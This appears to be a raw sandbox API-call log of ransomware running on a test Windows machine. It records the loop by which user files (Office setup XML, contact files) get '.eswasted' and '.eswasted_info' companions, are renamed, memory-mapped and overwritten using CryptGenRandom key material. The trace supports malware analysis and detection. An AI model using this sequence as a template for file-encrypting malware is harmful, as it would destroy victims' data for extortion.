[0072.428] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.428] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.428] lstrcpyW (in: lpString1=0x717b98, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0072.429] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0072.429] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0072.431] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.432] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.432] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.432] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.433] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.433] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.443] SetEndOfFile (hFile=0x11c) returned 1 [0072.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.445] CloseHandle (hObject=0x11c) returned 1 [0072.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0072.446] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.447] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.447] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.447] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0072.447] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a8) returned 0x717b00 [0072.447] lstrcpyW (in: lpString1=0x717b9e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.447] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.447] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.448] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.448] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.448] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.448] WriteFile (in: hFile=0x11c, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.449] SetEndOfFile (hFile=0x11c) returned 1 [0072.450] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.450] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.450] lstrcpyW (in: lpString1=0x717b9e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.eswasted")) returned 1 [0072.500] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0072.500] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0072.508] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.517] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.517] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.517] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.519] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.519] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.542] SetEndOfFile (hFile=0x11c) returned 1 [0072.544] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.544] CloseHandle (hObject=0x11c) returned 1 [0072.545] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0072.546] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.546] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.546] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.546] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0072.547] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28e) returned 0x717b00 [0072.547] lstrcpyW (in: lpString1=0x717b84, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.547] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.547] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.547] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.547] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.553] WriteFile (in: hFile=0x11c, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.554] SetEndOfFile (hFile=0x11c) returned 1 [0072.554] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.554] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.554] lstrcpyW (in: lpString1=0x717b84, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.554] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.eswasted")) returned 1 [0072.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0072.557] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0072.559] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.560] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.560] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.560] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.561] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.561] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.569] SetEndOfFile (hFile=0x11c) returned 1 [0072.571] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.571] CloseHandle (hObject=0x11c) returned 1 [0072.572] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0072.572] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.573] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.573] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.573] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0072.573] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28a) returned 0x717b00 [0072.573] lstrcpyW (in: lpString1=0x717b80, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.573] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.573] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.574] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.574] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.575] WriteFile (in: hFile=0x11c, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.577] SetEndOfFile (hFile=0x11c) returned 1 [0072.577] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.577] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.577] lstrcpyW (in: lpString1=0x717b80, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.577] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.eswasted")) returned 1 [0072.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0072.578] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0072.585] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.586] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.586] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.586] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.587] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.587] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.595] SetEndOfFile (hFile=0x11c) returned 1 [0072.597] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.597] CloseHandle (hObject=0x11c) returned 1 [0072.599] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0072.599] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.600] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.600] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.600] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0072.600] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28a) returned 0x717b00 [0072.600] lstrcpyW (in: lpString1=0x717b80, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.600] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.600] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.601] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.601] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.601] WriteFile (in: hFile=0x11c, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.602] SetEndOfFile (hFile=0x11c) returned 1 [0072.602] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.602] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.602] lstrcpyW (in: lpString1=0x717b80, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.602] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.eswasted")) returned 1 [0072.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0072.603] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0072.614] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.615] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.615] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.615] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.616] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.616] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.628] SetEndOfFile (hFile=0x11c) returned 1 [0072.631] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.631] CloseHandle (hObject=0x11c) returned 1 [0072.633] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0072.633] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.634] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.634] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.634] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0072.634] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x288) returned 0x717b00 [0072.634] lstrcpyW (in: lpString1=0x717b7e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.634] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.634] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.635] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.635] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.636] WriteFile (in: hFile=0x11c, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.637] SetEndOfFile (hFile=0x11c) returned 1 [0072.637] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.637] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.637] lstrcpyW (in: lpString1=0x717b7e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.637] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.eswasted")) returned 1 [0072.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0072.640] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0072.643] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0072.644] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.644] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.644] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0072.645] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0072.645] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.655] SetEndOfFile (hFile=0x11c) returned 1 [0072.657] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0072.657] CloseHandle (hObject=0x11c) returned 1 [0072.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0072.659] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0072.659] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0072.659] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0072.659] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28a) returned 0x717b00 [0072.660] lstrcpyW (in: lpString1=0x717b80, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.660] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0072.660] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0072.660] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0072.660] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.661] WriteFile (in: hFile=0x11c, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0072.662] SetEndOfFile (hFile=0x11c) returned 1 [0072.662] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, 